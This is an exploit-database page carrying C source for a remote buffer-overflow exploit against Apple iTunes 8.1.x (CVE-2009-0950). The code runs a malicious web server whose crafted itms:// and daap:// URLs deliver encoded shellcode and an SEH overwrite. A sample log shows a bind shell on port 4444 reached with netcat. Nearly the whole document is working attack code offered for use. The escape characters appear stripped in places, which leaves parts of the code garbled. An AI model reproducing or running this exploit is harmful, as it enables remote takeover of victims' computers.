[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Apple iTunes 8.1.x (daap) Buffer overflow remote exploit (CVE-2009-0950)
# Published : 2010-01-14
# Author : Simo36
# Previous Title : TrendMicro Web-Deployment ActiveX Remote Exec 0day POC
# Next Title : Adobe GetPlus get_atlcom v1.6.2.48 ActiveX Remote Exec 0day POC
/* iTunes-CVE09-s36.c
*
* Apple iTunes 8.1.x (daap) Buffer overflow remote exploit (CVE-2009-0950)
*
* Coded By :
* .:: [ Simo36 ] ::.
*
* Contact : Overflows@hotmail.com
* His0k4.hlm@gmail.com
*
* Home : www.sec-r1z.com
*
* Tested on : Win XP SP/SP3 Frensh , Win2k pro SP4 english
*
* Thanks To : Ryujin & Stack & r1z
*
* finally I want to thanks mr ryujin for printable shellcode and jump back .
*
*----------------------------------------------------------
* C:Documents and SettingsAdministrateurBureauexploit>iTunes-CVE09-s36..exe
*
* [+] Apple iTunes 8.1.x Buffer overflow remote exploit CVE-2009-0950
*
* [+] By : Simo36 & His0k4 ( Overflows@hotmail.com )
*
* [+] Home : www.sec-r1z.com
* [+] Listen on port 80
*
* [+] Connection accepted from 127.0.0.1:1097
*
* [x] Sendin welcome information....Done
*
* [+] sending the evil packet ...[+] Done !
*
* [+] check port 4444 with netcat
*
* [+] Connection Closed
*
*
*
*----------------------------------------------------------------
* C:Documents and SettingsAdministrateurBureauexploit>nc -v 196.217.232.130 4444
* sweet-9fc9abcd4 [196.217.232.130] 4444 (?) open
* Windows XP Sweet 5.1 [SP3 v5.1.2600]
*(C) Copyright 1985-2001 Microsoft Corp.
*
* C:Program FilesMozilla Firefox>
*
*
*
*
*
*
* Note : This vulnerability can't be exploited with simply return address Because
* it is affected with GS Flag .
*
* Compiler : Dev-C++ & mingw
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#define Max_BUFF 2037
#define PORT 80
char header1[]=
"<html>n"
" <head><title>iTunes Remote Exploit</title>n"
" <script>n"
" function openiTunes(){document.location.assign('itms://itunes.apple.com/');}n"
" function prepareStack(){document.location.assign('";
char header2[]=
"');}n function ownSeh(){document.location.assign('";
char header3[]=
"');}n function ipwn(){n"
" prepareStack();n ownSeh();n }"
"n function main() {n openiTunes(); n"
" setTimeout('ipwn()',20000);n }n";
char header4[]=
" </script>n"
" </head>n"
"<body onload='main();'>n"
"<html>n"
"<head>n"
" <title></title>n"
"</head>n"
"<body style='color: rgb(0, 0, 0);' onload='main();'n"
" alink='#ee0000' link='#0000ee' vlink='#551a8b'>n"
"<p align='center'><b>Apple iTunes 8.1.1.10 (daap)n"
"BOF remote exploit </b></p>n"
"<p align='center'><an"
" href='http://dvlabs.tippingpoint.com/advisory/TPTI-09-03'><b>n"
"CVE-2009-0950</b></a>n"
"</p>n"
"<p align='center'><span style='font-weight: bold;'>Exploitedn"
"by : Simo36 { Overflows [AT] Hotmail [DOT] com }</span></p>n"
"<p align='center'><span style='font-weight: bold;'></span></p>n"
"<p align='center'><b>www.sec-r1z.com</b></p>n"
"<p align='center'>based on the code found by Matteon"
"Memelli <br>n"
"</p>n"
"<h2 align='center'><b><u>This exploit works ifn"
"opened from Firefox only!</u></b>n"
"</h2>n"
"<p align='center'>n"
"After exploitation iTunes crashes, you need to kill it from TaskManagern"
"<br>n"
"have fun!</p>n"
"<p align='center'><br>n"
"</p>n"
"<p></p>n"
"</body>n"
"</html>n";
// printable shellcode via EDX
unsigned char shellcode[]=
"VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA";
// ascii printable jump code (alpha2)
char jump_code[]= "x55x59x43x43x43x43x43x43x49x49x49x49x49x49x49x49"
"x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
"x51x32x41x42x32x42x42x30x42x42x41x42x58x50x38x41"
"x42x75x4ax49x5ax49x45x35x6ax5ax4bx4fx4bx4fx41";
// pop EDX from Stack and Incrasing it
char align_stack[]= "x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61"
"x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61"
"x61x61x61x61x61x54x5ax42x42x42x42x42x42x56x56x56x56x56x56x56"//
"x56x56x56";
int main(void){
struct sockaddr_in server,client;
FILE *p;
WSADATA wsa;
SOCKET sock1,sock2;
int res;
char sdinfo[]="200nr";
char szRecvBuff[0x100];
char url2[Max_BUFF];
char url1[210];
char payload[7000];
int i=0;
system("cls");
printf("n[+] Apple iTunes 8.1.x Buffer overflow remote exploit CVE-2009-0950nn");
printf("[+] By : ttSimo36 & His0k4 ( Overflows@hotmail.com ) nn");
printf("[+] Home :tt www.sec-r1z.comn");
if(WSAStartup(MAKEWORD(1 ,1),&wsa) !=0){
printf("[-] WSAStartup error:%dn", WSAGetLastError());
return;
}
sock1 = socket(AF_INET,SOCK_STREAM,0);
server.sin_family = AF_INET;
server.sin_port= htons(PORT);
server.sin_addr.s_addr=0;
res = bind(sock1,(struct sockaddr *)&server ,sizeof(server));
res = listen(sock1, 100);
printf("[+] Listen on port 80 nn");
while(1){
res = sizeof(client);
sock2 = accept(sock1, (struct sockaddr *)&client, &res);
printf("[+] Connection accepted from %s:%dnn",
inet_ntoa(client.sin_addr), ntohs(client.sin_port));
printf("[x] Sendin welcome information....");
if(send(sock2,sdinfo,strlen(sdinfo),0) !=-1){
Sleep(1000);
printf("Donen");
res = recv(sock2, szRecvBuff, sizeof(szRecvBuff), 0);
res=recv(sock2,sdinfo,strlen(sdinfo),0);
szRecvBuff[res-1] = 'x0';
/**** ITMS URL ****/
memset(url1,0x41,strlen(url1));
strcpy(&url1[0],"itms://:");
memset(&url1[8],0x42,200);
strcpy(&url1[208],"/");
// Second url
memset(url2,0x42,strlen(url2));
strcpy(&url2[0],"daap://:");
// some padd
memset(&url2[8],0x41,425);
// align with push esp and pop edx
strcpy(&url2[433],align_stack);
// Shellcode Ready !
strcpy(&url2[496],shellcode);
memset(&url2[1226],0x41,570);
strcpy(&url2[1796],"x61x45x45x45");
strcpy(&url2[1800],"x2ax5ex21x67");// Thanks Riyujin for this
strcpy(&url2[1804],"DEEEEEEE");
strcpy(&url2[1812],jump_code);
memset(&url2[1875],0x43,161);
strcpy(&url2[2036],"C");
// building exploit
memset(payload,0x41,7000);
strcpy(&payload[0],header1);
// evil packet is ready now :)
strcpy(&payload[strlen(header1)],url1);
strcpy(&payload[strlen(header1)+strlen(url1)],header2);
strcpy(&payload[strlen(header1)+strlen(url1)+strlen(header2)],url2);
strcpy(&payload[strlen(header1)+strlen(url1)+strlen(header2)+strlen(url2)],header3);
strcpy(&payload[strlen(header1)
+strlen(url1)+strlen(header2)+strlen(url2)+strlen(header3)],header4);
printf("n[+] sending the evil packet ...");
if(send(sock2,payload,strlen(payload),0) !=-1){
res=recv(sock2,payload,strlen(payload),0);
sleep(100);
closesocket(sock2);
printf("[+] Done ! nn");
printf("[+] check port 4444 with netcat nn");
printf("[+] Connection Closednn");
}else printf ("[-] Error on sending payload !");
}else printf("Errorn");
exit(0);
}
WSACleanup();
return 0x0;
}